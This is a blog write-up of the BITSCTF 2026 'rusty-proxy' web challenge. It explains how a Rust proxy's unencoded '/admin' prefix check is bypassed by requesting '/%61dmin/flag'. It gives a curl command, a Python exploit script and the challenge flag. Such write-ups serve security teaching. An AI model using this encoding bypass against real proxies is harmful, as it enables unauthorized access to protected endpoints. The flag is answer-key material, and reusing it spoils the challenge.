75 words
1 minutes
BITSCTF 2026 - rusty-proxy - Web Exploitation Writeup
Event Archive

BITSCTF 2026

Posts, writeups, and notes grouped under this event.

Archive/15 posts
Events/BITSCTF 2026
2026-02-22
Writeup
CTF
/
Security
/
Web Exploitation

Category: Web Exploitation
Flag: BITSCTF{tr4il3r_p4r51n6_15_p41n_1n_7h3_4hh}

Challenge Description#

Rust reverse proxy with Flask backend. Remote: http://rusty-proxy.chals.bitskrieg.in:25001

Analysis#

Proxy ACL in main.rs:

fn is_path_allowed(path: &str) -> bool {
    let normalized = path.to_lowercase();
    if normalized.starts_with("/admin") {
        return false;
    }
    true
}

The proxy checks the raw request path without URL decoding. Flask decodes %61a.

Exploitation#

curl "http://rusty-proxy.chals.bitskrieg.in:25001/%61dmin/flag"

/%61dmin/flag passes proxy check (doesn’t start with /admin), but Flask receives /admin/flag.

Or using Python:

#!/usr/bin/env python3
import requests

URL = "http://rusty-proxy.chals.bitskrieg.in:25001/%61dmin/flag"

r = requests.get(URL, timeout=10)
data = r.json()
print(f"Flag: {data.get('flag')}")
BITSCTF 2026 - rusty-proxy - Web Exploitation Writeup
https://blog.rei.my.id/posts/49/bitsctf-2026-rusty-proxy-web-exploitation-writeup/
Author
Reidho Satria
Published at
2026-02-22
License
CC BY-NC-SA 4.0
© 2026 Reidho Satria. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari